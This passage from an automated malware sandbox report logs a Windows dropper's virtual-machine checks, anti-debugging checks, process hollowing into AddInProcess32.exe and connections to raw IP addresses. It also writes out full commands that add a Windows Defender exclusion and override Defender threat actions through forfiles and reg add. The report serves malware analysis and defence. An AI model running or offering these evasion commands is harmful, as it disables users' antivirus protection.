                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1315587677.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000024.00000000.1419179675.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2789612356.000001F4D86DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: svchost.exe, 0000000B.00000002.2734633593.000001E0D128C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1315587677.00000000005D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW7Fup
                  Source: explorer.exe, 00000024.00000000.1419179675.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
                  Source: svchost.exe, 0000000B.00000002.2695550884.000001E0D124B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: svchost.exe, 0000000D.00000002.2695447346.000001B899287000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C6000c298128b8c02a71a2474aeb5f3dc|Virtual disk |VMware
                  Source: svchost.exe, 0000001C.00000002.2523419061.0000017993A2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &@\??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000024.00000000.1419179675.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
                  Source: explorer.exe, 00000024.00000000.1419179675.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
                  Source: explorer.exe, 00000024.00000000.1419179675.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                  Source: svchost.exe, 0000000D.00000003.1410168158.000001B899B47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000SCSI\CdRomNECVMWarVMware_SATA_CD001.00SCSI\CdRomNECVMWarVMware_SATA_CD00SCSI\CdRomNECVMWarSCSI\NECVMWarVMware_SATA_CD001NECVMWarVMware_SATA_CD001GenCdRom
                  Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware20,1
                  Source: explorer.exe, 00000024.00000000.1373594900.0000000007306000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: svchost.exe, 0000000D.00000003.1410168158.000001B899B47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                  Source: explorer.exe, 00000024.00000000.1419179675.0000000008F27000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT`
                  Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
                  Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
                  Source: svchost.exe, 0000001C.00000003.1311533226.0000017993A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: svchost.exe, 0000001C.00000002.2523419061.0000017993A2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000&00000
                  Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                  Source: explorer.exe, 00000024.00000000.1419179675.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000024.00000000.1321857063.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: svchost.exe, 0000000B.00000002.2721253426.000001E0D1264000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                  Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                  Source: svchost.exe, 0000001C.00000003.1311218476.0000017993A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: svchost.exe, 0000000B.00000002.2721253426.000001E0D127F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: svchost.exe, 0000000D.00000002.2762397674.000001B899B32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?VMware-4288 1!cc 59 1`
                  Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
                  Source: explorer.exe, 00000024.00000000.1419179675.0000000009013000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                  Source: explorer.exe, 00000024.00000000.1373594900.0000000007306000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_xU1
                  Source: svchost.exe, 0000000D.00000002.2695447346.000001B899287000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6000c298128b8c02a71a2474aeb5f3dc|Virtual disk |VMware
                  Source: AddInProcess32.exe, 00000005.00000002.2528201229.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2537509496.00000238A0831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000000.1290598899.0000000140AAD000.00000080.00000001.01000000.0000000E.sdmpBinary or memory string: <$hGfSuA_A
                  Source: svchost.exe, 0000000D.00000003.1410135146.000001B899B36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dc
                  Source: svchost.exe, 0000000D.00000003.1410168158.000001B899B47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dc$
                  Source: svchost.exe, 0000000B.00000002.2686253357.000001E0D122B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000024.00000000.1419179675.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
                  Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
                  Source: svchost.exe, 0000001C.00000002.2523240829.0000017993A02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                  Source: svchost.exe, 00000034.00000002.2732590110.000001F4D8694000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMWare
                  Source: explorer.exe, 00000024.00000000.1419179675.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
                  Source: svchost.exe, 00000034.00000002.2705850563.000001F4D862B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                  Source: svchost.exe, 0000000B.00000002.2686253357.000001E0D123A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: svchost.exe, 0000000D.00000002.2695447346.000001B899287000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                  Source: explorer.exe, 00000024.00000000.1321857063.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                  Source: svchost.exe, 0000000D.00000003.1410168158.000001B899B47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000SCSI\DiskVMware__Virtual_disk____2.0_SCSI\DiskVMware__Virtual_disk____SCSI\DiskVMware__SCSI\VMware__Virtual_disk____2VMware__Virtual_disk____2GenDisk
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeAPI call chain: ExitProcess graph end nodegraph_18-16474
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeSystem information queried: ModuleInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeSystem information queried: CodeIntegrityInformation
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeThread information set: HideFromDebugger
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeThread information set: HideFromDebugger
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeOpen window title or class name: regmonclass
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeOpen window title or class name: procmon_window_class
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeOpen window title or class name: filemonclass
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeProcess queried: DebugPort
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeProcess queried: DebugPort
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeProcess queried: DebugPort
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeProcess queried: DebugObjectHandle
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeProcess queried: DebugPort
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeProcess queried: DebugObjectHandle
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeProcess queried: DebugPort
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_00403406 NtClose,LdrLoadDll,RtlZeroMemory,GetModuleHandleA,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower,8_2_00403406
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeCode function: 18_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,18_2_00418320
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_02E10D90 mov eax, dword ptr fs:[00000030h]8_2_02E10D90
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_02E1092B mov eax, dword ptr fs:[00000030h]8_2_02E1092B
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_03021E8F push dword ptr fs:[00000030h]8_2_03021E8F
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E35755C0 RtlAddVectoredExceptionHandler,0_2_00007FF7E35755C0
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E35D9808 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7E35D9808
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeCode function: 18_2_0041584A SetUnhandledExceptionFilter,18_2_0041584A
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeCode function: 18_2_0041585C SetUnhandledExceptionFilter,18_2_0041585C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\explorer.exeFile created: FFE8.exe.36.drJump to dropped file
                  Source: C:\Windows\explorer.exeNetwork Connect: 91.202.233.231 80
                  Source: C:\Windows\explorer.exeNetwork Connect: 190.224.203.37 80
                  Source: C:\Windows\explorer.exeNetwork Connect: 45.129.96.86 80
                  Source: C:\Windows\explorer.exeNetwork Connect: 66.85.156.89 80
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfile
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfileJump to behavior
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeThread created: C:\Windows\explorer.exe EIP: 89419E0
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeRegistry value deleted: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpyware
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeNtQueryInformationProcess: Indirect: 0x140D79DBC
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeNtQueryInformationProcess: Indirect: 0x140737CF6
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeNtSetInformationThread: Indirect: 0x14074EFD4
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeNtQuerySystemInformation: Indirect: 0x140D20A0E
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeNtQueryInformationProcess: Indirect: 0x140D79F0B
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeNtQueryInformationProcess: Indirect: 0x140737BBA
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeNtSetInformationThread: Indirect: 0x140D9A2AB
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeNtQuerySystemInformation: Indirect: 0x1406D842B
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read write
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                  Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                  Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                  Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                  Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                  Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                  Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base address: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 404000Jump to behavior
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 406000Jump to behavior
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 674008Jump to behavior
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe "C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe" /sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe "C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe "C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe "C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe "C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
